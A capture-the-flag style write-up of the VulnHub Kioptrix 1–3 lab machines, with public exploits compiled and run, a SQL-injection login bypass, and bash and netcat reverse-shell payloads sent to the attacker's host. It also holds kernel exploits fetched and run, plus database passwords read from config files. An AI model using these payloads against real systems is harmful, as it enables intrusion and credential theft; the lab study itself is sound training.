VulnHub Kioptrix series write-up

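Preface

VulnHub provides many target machines for security enthusiasts to practise penetration testing on, and it is a good environment for getting started with penetration testing.

The Kioptrix series contains several target machines, and each of them can be compromised in more than one way.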

Kioptrix#1

Download: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

  • Target IP 192.168.214.136
  • Kali IP 192.168.214.135

OpenSSL vulnerability

Start with an nmap scan:

# Nmap 7.70 scan initiated Fri Sep 28 21:38:59 2018 as: nmap -sS -A -oN /root/Desktop/kioptrix1.txt 192.168.214.136
Nmap scan report for 192.168.214.136
Host is up (0.015s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: mMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-09-29T01:41:08+00:00; +1m52s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:43:1E:F2 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 1m51s, deviation: 0s, median: 1m51s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT ADDRESS
1 14.76 ms 192.168.214.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 28 21:43:26 2018 -- 1 IP address (1 host up) scanned in 267.95 seconds

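The home page is the Apache test page. Scanning directories with dirb finds a few entries, but none of them are useful.

From the nmap output we can identify:

  1. Apache/1.3.20
  2. mod_ssl/2.8.4 OpenSSL/0.9.6b
  3. The Samba service on port 139
  4. Linux 2.4.X Red-Hat/Linux

Looking up Apache exploits with searchsploit turns up the following entries, which look usable: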

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow | exploits/unix/remote/40347.txt

cp /usr/share/exploitdb/exploits/unix/remote/764.c ~/Desktop/764.c

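It does not compile with the build command given in the exploit, but instructions for updating it are available:

http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/

Follow those instructions; in addition, libssl1.0-dev has to be installed with apt-get install libssl1.0-dev.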

gcc -o OpenFuck 764.c -lcrypto

root@kali:~/Desktop# ./OpenFuck 0x6a 192.168.214.136

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80fc4e8
Ready to send shellcode
Spawning shell...
Good Bye!
root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.214.136

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80fc4e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--22:36:29-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--22:36:30-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 3.74 MB/s

22:36:31 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 7390
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
ls
p
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root

The shell obtained this way already has root privileges.

The third exploit, openssl-too-open, also works.

wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40347.tar.gz

tar -xzvf 40347.tar.gz

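Running make directly fails, and searching did not turn up a fix. The errors point to ssl2.c; remembering the change made to the previous exploit, I added the two headers #include <openssl/x509.h> #include <openssl/evp.h>, after which make succeeds.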

root@kali:~/Desktop/openssl-too-open# ./openssl-too-open 
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>

Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode

Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

Examples: ./openssl-too-open -a 0x01 -v localhost
./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80

root@kali:~/Desktop/openssl-too-open# ./openssl-too-open -a 0x09 192.168.214.136
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>

: Opening 30 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x80f8050
ssl1 : 0x80f8050
ssl2 : 0x80f8050

: Sending shellcode
ciphers: 0x80f8050 start_addr: 0x80f7f90 SHELLCODE_OFS: 208
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
11:11pm up 2:25, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$
bash-2.05$ ls
ls
bin
boot
dev
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$

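With this exploit, however, the shell only has the privileges of the apache user.

Samba vulnerability

Scanning the version with the msf smb_version module shows 2.2.1a.

Run searchsploit samba to see whether there is a usable exploit.

There is one match: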
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | exploits/multiple/remote/10.c

root@kali:~# cp /usr/share/exploitdb/exploits/multiple/remote/10.c ~/Desktop/10.c
root@kali:~# cd Desktop/
root@kali:~/Desktop# gcc 10.c -o fucksamba
root@kali:~/Desktop# chmod +x fucksamba
root@kali:~/Desktop# ./fucksamba
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./fucksamba [-bBcCdfprsStv] [host]

-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step> bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p <port> port to attack (default = 139)
-r <ret> return address
-s scan mode (random)
-S <network> scan mode
-t <type> presets (0 for a list)
-v verbose mode
root@kali:~/Desktop# ./fucksamba -b 0 -v 192.168.214.136
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root

This also gives root privileges.

Kioptrix#2

Download: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

  • Target IP 192.168.214.138
  • Kali IP 192.168.214.139

nmap scan

root@kali:~# nmap -sS -A 192.168.214.138
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-15 09:10 EDT
Nmap scan report for 192.168.214.138
Host is up (0.00026s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 678/udp status
|_ 100024 1 681/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-10-15T10:01:19+00:00; -3h09m45s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:E1:91:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -3h09m45s, deviation: 0s, median: -3h09m45s

TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.214.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.43 seconds

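Reverse shell through the web application

The home page http://192.168.214.138/ is a login form.

The page source contains a hint, Administator:
<!-- Start of HTML when logged in as Administator -->

The universal-password string Administator'or'1'='1 logs in.

After logging in there is an input box that runs the ping command. The input is not filtered, so commands can be injected; use it to get a reverse shell.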

127.0.0.1 | bash -i >& /dev/tcp/192.168.214.139/7777 0>&1

root@kali:/# nc -lvvp 7777
listening on [any] 7777 ...
192.168.214.138: inverse host lookup failed: Unknown host
connect to [192.168.214.139] from (UNKNOWN) [192.168.214.138] 32769
bash: no job control in this shell
bash-3.00$ ls
index.php
pingit.php
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

The source of index.php contains the database connection password.

bash-3.00$ cat index.php
cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");

if ($_POST['uname'] != ""){
$username = $_POST['uname'];
$password = $_POST['psw'];
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
//print $query."<br>";
$result = mysql_query($query);

$row = mysql_fetch_array($result);
//print "ID: ".$row['id']."<br />";
}

?>
<html>
<body>
<?php
if ($row['id']==""){
?>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
<tr>
<td colspan='2' align='center'>
<b>Remote System Administration Login</b>
</td>
</tr>
<tr>
<td width="150">Username</td>
<td><input name="uname" type="text"></td>
</tr>
<tr>
<td width="150">Password</td>
<td>
<input name="psw" type="password">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="btnLogin" value="Login">
</td>
</tr>
</table>
</form>
<?php
} //END of login form
?>

<!-- Start of HTML when logged in as Administator -->
<?php
if ($row['id']==1){
?>
<form name="ping" action="pingit.php" method="post" target="_blank">
<table width='600' border='1'>
<tr valign='middle'>
<td colspan='2' align='center'>
<b>Welcome to the Basic Administrative Web Console<br></b>
</td>
</tr>
<tr valign='middle'>
<td align='center'>
Ping a Machine on the Network:
</td>
<td align='center'>
<input type="text" name="ip" size="30">
<input type="submit" value="submit" name="submit">
</td>
</td>
</tr>
</table>
</form>


<?php
}
?>
</body>
</html>

Trying to switch to the john account with the password hiroshima fails; the password is wrong.
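
The login query in index.php and the unfiltered ping field used above, shown next to their fixes. This is an added example, not code from the original post or from the target: it rebuilds the query in Python with sqlite3 instead of PHP and MySQL, the table rows and the `127.0.0.1 | id` input are constructed, and because the source of pingit.php is not shown, the shell-string handler is an assumption.

```python
import ipaddress
import sqlite3


def make_db():
    """In-memory stand-in for the webapp database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (id, username, password) VALUES (?, ?, ?)",
        [(1, "admin", "constructed-admin-secret"),
         (2, "john", "constructed-john-secret")],
    )
    return db


def login_vulnerable(db, username, password):
    """Same construction as index.php: user input is pasted into the SQL text."""
    query = ("SELECT * FROM users WHERE username = '%s' AND password='%s'"
             % (username, password))
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(db, username, password):
    """Bound parameters: the input stays data and cannot change the query.

    The plaintext comparison only mirrors the original schema; a real fix
    would also store password hashes instead of passwords.
    """
    row = db.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def ping_command_vulnerable(target):
    """Shell line produced when the form field is appended to a command
    (assumed behaviour of pingit.php, whose source is not on the page)."""
    return "ping -c 3 " + target


def ping_argv_hardened(target):
    """Accept only a literal IP address and return an argv list meant for
    subprocess.run(argv, shell=False), so no shell ever parses the input."""
    addr = ipaddress.ip_address(target.strip())  # raises ValueError otherwise
    return ["ping", "-c", "3", str(addr)]


def demo():
    db = make_db()
    bypass = "Administator'or'1'='1"   # string from the write-up, sent as the password
    injected = "127.0.0.1 | id"        # constructed, harmless injection sample
    try:
        ping_argv_hardened(injected)
        rejected = False
    except ValueError:
        rejected = True
    return {
        # OR '1'='1' makes the WHERE clause true for every row; row id 1 comes back
        "vulnerable_login": login_vulnerable(db, "anything", bypass),
        "hardened_login": login_hardened(db, "anything", bypass),
        "hardened_valid_login": login_hardened(db, "admin", "constructed-admin-secret"),
        "shell_line": ping_command_vulnerable(injected),
        "injection_rejected": rejected,
        "clean_argv": ping_argv_hardened("192.168.214.138"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

index.php treats `id == 1` as the administrator, which is why returning the first row of the table is enough to reach the ping form.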

Privilege escalation attempt

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ lsb_release -a
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final

The system is CentOS 4.5 with kernel 2.6.9.

Run searchsploit CentOS to look for exploits.

One exploit matches:

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Lo | exploits/linux/local/9545.c

Compile and run the exploit in the reverse shell:

bash-3.00$ wget 192.168.214.139/9542.c
--06:34:52-- http://192.168.214.139/9542.c
=> `9542.c'
Connecting to 192.168.214.139:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [text/plain]

0K .. 100% 315.07 MB/s

06:34:52 (315.07 MB/s) - `9542.c' saved [2643/2643]

bash-3.00$ gcc -o 0x82-CVE-2009-2698 9542.c
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
0x82-CVE-2009-2698
9542.c
les.sh
bash-3.00$ ./0x82-CVE-2009-2698
sh: no job control in this shell

sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Root privileges obtained.

Kioptrix#3

Download: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

  • Target IP 192.168.214.140
  • Kali IP 192.168.214.139

nmap scan

root@kali:~# nmap -sS -A 192.168.214.140
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-18 08:51 EDT
Nmap scan report for 192.168.214.140
Host is up (0.00032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:A9:2C:B4 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.214.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

LotusCMS RCE

The home page shows that the site runs LotusCMS, and scanning confirms it.

root@kali:~# whatweb http://192.168.214.140
http://192.168.214.140 [200 OK] Apache[2.2.8], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], IP[192.168.214.140], maybe LotusCMS, Meta-Author[name of author - Manjeet Singh Sawhney www.manjeetss.com], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], Title[Ligoat Security - Got Goat? Security ...], X-Powered-By[PHP/5.2.4-2ubuntu5.6]

A search shows that it has a remote command execution vulnerability.

Listen locally and catch the reverse shell:

http://kioptrix3.com/index.php?page=index%27);system(%27nc%20-e%20/bin/bash%20192.168.214.139%207777%27);//

root@kali:~# nc -lvvp 7777
listening on [any] 7777 ...
connect to [192.168.214.139] from kioptrix3.com [192.168.214.140] 44671
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell obtained.

$ uname -a
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 8.04.3 LTS
Release: 8.04
Codename: hardy

Next I tried to escalate privileges with an exploit, but none of the several exploits I tried worked.

www-data@Kioptrix3:/tmp$ ls
ls
40616.c 5092.c 8556.c a.out c0w les.sh
5092 5093.c LinEnum.sh bak c0w.c

Information gathering

/etc/passwd shows two more users, loneferret and dreg.

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

The home directory of dreg contains nothing of interest, while the home directory of loneferret does.

www-data@Kioptrix3:/home/loneferret$ ls -al
ls -al
total 64
drwxr-xr-x 3 loneferret loneferret 4096 Apr 17 2011 .
drwxr-xr-x 5 root root 4096 Apr 16 2011 ..
-rw-r--r-- 1 loneferret users 13 Apr 18 2011 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 Apr 11 2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 Apr 11 2011 .bashrc
-rw------- 1 root root 15 Apr 15 2011 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 Apr 11 2011 .profile
drwx------ 2 loneferret loneferret 4096 Apr 14 2011 .ssh
-rw-r--r-- 1 loneferret loneferret 0 Apr 11 2011 .sudo_as_admin_successful
-rw-r--r-- 1 root root 224 Apr 16 2011 CompanyPolicy.README
-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh
www-data@Kioptrix3:/home/loneferret$ cat CompanyPolicy.README
cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
www-data@Kioptrix3:/home/loneferret$ sudo ht
sudo ht
[sudo] password for www-data:

The sudo command asks for a password, so that is a dead end.

Back to the website: scan its directories.

root@kali:~# dirb http://kioptrix3.com /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Oct 18 10:47:56 2018
URL_BASE: http://kioptrix3.com/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------

GENERATED WORDS: 87568

---- Scanning URL: http://kioptrix3.com/ ----
==> DIRECTORY: http://kioptrix3.com/modules/
==> DIRECTORY: http://kioptrix3.com/gallery/
+ http://kioptrix3.com/data (CODE:403|SIZE:324)
==> DIRECTORY: http://kioptrix3.com/core/
==> DIRECTORY: http://kioptrix3.com/style/
==> DIRECTORY: http://kioptrix3.com/cache/
==> DIRECTORY: http://kioptrix3.com/phpmyadmin/

---- Entering directory: http://kioptrix3.com/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://kioptrix3.com/gallery/ ----
==> DIRECTORY: http://kioptrix3.com/gallery/themes/
==> DIRECTORY: http://kioptrix3.com/gallery/photos/

---- Entering directory: http://kioptrix3.com/core/ ----
==> DIRECTORY: http://kioptrix3.com/core/view/
==> DIRECTORY: http://kioptrix3.com/core/lib/


......

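phpmyadmin is present, but logging in with the default credentials root/root fails. Since we already have a shell, the MySQL password can be read from the configuration file.

Database configuration file

Go to the site's root directory and look for the database configuration file.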

  1. grep "localhost" ./ -R

grep "localhost" ./ -R
./gallery/gconfig.php: $GLOBALS["gallarific_mysql_server"] = "localhost";

  2. ls -l -R | grep config

www-data@Kioptrix3:/home/www/kioptrix3.com$ ls -l -R | grep config
ls -l -R | grep config
drwxrwxrwx 3 root root 4096 Apr 14 2011 config
./data/config:
./data/config/modules:
-rwxrwxrwx 1 root root 369 Aug 3 2010 config.txt
-rw-r--r-- 1 root root 1440 Apr 14 2011 gconfig.php

www-data@Kioptrix3:/home/www/kioptrix3.com$ locate gconfig.php
locate gconfig.php
/home/www/kioptrix3.com/gallery/gconfig.php
www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /home/www/kioptrix3.com/gallery/gconfig.php
<w/kioptrix3.com$ cat /home/www/kioptrix3.com/gallery/gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}

}
}

?>

